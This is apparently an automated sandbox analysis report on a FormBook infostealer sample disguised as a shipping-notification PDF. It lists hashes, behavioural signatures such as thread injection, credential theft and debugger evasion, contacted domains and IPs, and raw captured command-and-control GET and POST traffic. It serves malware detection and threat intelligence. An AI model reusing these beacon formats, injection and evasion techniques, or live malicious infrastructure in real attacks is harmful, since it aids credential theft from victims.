Windows Analysis Report
shipping notification_pdf.exe

Overview

General Information

Sample name:	shipping notification_pdf.exe
Analysis ID:	1520196
MD5:	d9e239c79f89ec481ec939d7f784c89e
SHA1:	9b83acaa385abba92e8d3566479578af4fcdd954
SHA256:	0ef342eee9167ec78306dabdd82b0c41f34f1e3ed7d35676a602735497d72101
Tags:	exeFormbookuser-threatcat_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected FormBook

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: shipping notification_pdf.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: shipping notification_pdf.exe

ReversingLabs: Detection: 31%

Yara detected FormBook

Source: Yara match	File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: shipping notification_pdf.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: shipping notification_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: sort.pdb source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AVyNLNHPrma.exe, 0000000A.00000002.3134753679.000000000003E000.00000002.00000001.01000000.00000005.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614506571.000000000003E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: sort.pdbGCTL source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\sort.exe

Code function: 11_2_02F8C040 FindFirstFileW,FindNextFileW,FindClose,

11_2_02F8C040

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\SysWOW64\sort.exe	Code function: 4x nop then xor eax, eax	11_2_02F79B00
Source: C:\Windows\SysWOW64\sort.exe	Code function: 4x nop then pop edi	11_2_02F92108
Source: C:\Windows\SysWOW64\sort.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_037B04E8
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 4x nop then xor eax, eax	12_2_0532A86F
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe	Code function: 4x nop then pop edi	12_2_05326088
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	14_2_00000221B5F324E8

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 208.91.197.27 208.91.197.27

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.antura.partnersAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.skystargazeguide.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.nmh6.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.sapatarias.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.softillery.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0 HTTP/1.1Host: www.priunit.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6 HTTP/1.1Host: www.consultarfacil.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.48vlu.shop
Source: global traffic	DNS traffic detected: DNS query: www.antura.partners
Source: global traffic	DNS traffic detected: DNS query: www.skystargazeguide.store
Source: global traffic	DNS traffic detected: DNS query: www.nmh6.site
Source: global traffic	DNS traffic detected: DNS query: www.sapatarias.online
Source: global traffic	DNS traffic detected: DNS query: www.softillery.info
Source: global traffic	DNS traffic detected: DNS query: www.asiapartnars.online
Source: global traffic	DNS traffic detected: DNS query: www.priunit.online
Source: global traffic	DNS traffic detected: DNS query: www.consultarfacil.online
Source: global traffic	DNS traffic detected: DNS query: www.exhibitarrange.shop

Source: unknown

HTTP traffic detected: POST /jnnq/ HTTP/1.1Host: www.skystargazeguide.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.skystargazeguide.storeContent-Length: 217Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.skystargazeguide.store/jnnq/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36Data Raw: 33 68 2d 70 3d 41 6b 74 4f 48 32 66 37 36 4f 78 42 47 39 75 6a 53 68 4b 6a 4a 41 43 45 6e 41 53 34 61 50 41 62 41 56 67 75 54 42 43 49 76 55 67 31 64 68 45 58 64 4b 48 47 53 48 74 4e 33 6c 77 38 30 47 77 30 56 47 50 33 73 42 75 6e 47 65 31 61 4c 6f 68 4a 6a 35 72 46 46 4e 6a 52 56 71 48 48 66 4f 68 79 4f 56 63 55 51 34 4b 56 74 30 33 57 75 63 58 6d 6a 6b 64 6f 64 66 4d 6c 6d 45 34 4e 39 41 43 58 34 6d 6a 69 7a 2f 69 43 37 53 65 37 6a 55 70 7a 59 53 52 2b 32 36 79 57 72 30 65 31 4e 77 6e 41 6f 76 53 66 39 59 54 6f 4e 65 52 72 6e 6d 35 4f 4a 62 75 52 67 62 4b 65 74 43 6b 48 50 78 70 6d 6c 7a 56 36 48 6d 51 50 72 2f 44 70 63 36 6d 39 77 77 3d 3d Data Ascii: 3h-p=AktOH2f76OxBG9ujShKjJACEnAS4aPAbAVguTBCIvUg1dhEXdKHGSHtN3lw80Gw0VGP3sBunGe1aLohJj5rFFNjRVqHHfOhyOVcUQ4KVt03WucXmjkdodfMlmE4N9ACX4mjiz/iC7Se7jUpzYSR+26yWr0e1NwnAovSf9YToNeRrnm5OJbuRgbKetCkHPxpmlzV6HmQPr/Dpc6m9ww==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 04:35:16 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 04:35:18 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 04:35:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f 83 40 10 85 ef fc 8a b1 27 3d b8 83 04 13 0f 9b 4d 6c a1 b1 09 56 62 e1 e0 71 eb 4e 0b b1 b2 b8 3b 48 ea af 77 a1 31 f1 32 c9 9b f9 de cb 1b 79 95 bd ac aa b7 32 87 a7 ea b9 80 b2 5e 16 9b 15 2c 6e 11 37 79 b5 46 cc aa ec 72 49 44 8c 98 6f 17 2a 92 0d 7f 9e 94 6c 48 9b 20 b8 e5 13 a9 34 4e 61 6b 19 d6 76 e8 8c c4 cb 32 92 38 43 72 6f cd 79 f2 dd a9 7f 4c 50 91 ec 55 d5 10 38 fa 1a c8 33 19 a8 5f 0b 18 b5 87 2e 70 87 89 03 db 01 37 ad 07 4f ee 9b 9c 90 d8 4f 49 2e 0c 6d 8c 23 ef d5 63 af df 1b c2 44 a4 e2 3e 81 eb 7a 3f 74 3c dc c0 6e 36 80 66 18 c7 51 f8 8f b3 67 ed 8e fa 87 8e 43 6b 48 78 b6 8e a0 b4 8e e1 21 96 f8 17 16 3a cf 6d 43 bf e9 cb e8 17 7b 68 f4 b3 20 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f1MAO@'=MlVbqN;Hw12y2^,n7yFrIDo*lH 4Nakv28CroyLPU83_.p7OOI.m#cD>z?t<n6fQgCkHx!:mC{h 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 27 Sep 2024 04:35:24 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 32 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6b 79 73 74 61 72 67 61 7a 65 67 75 69 64 65 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.skystargazeguide.store Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:43 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested 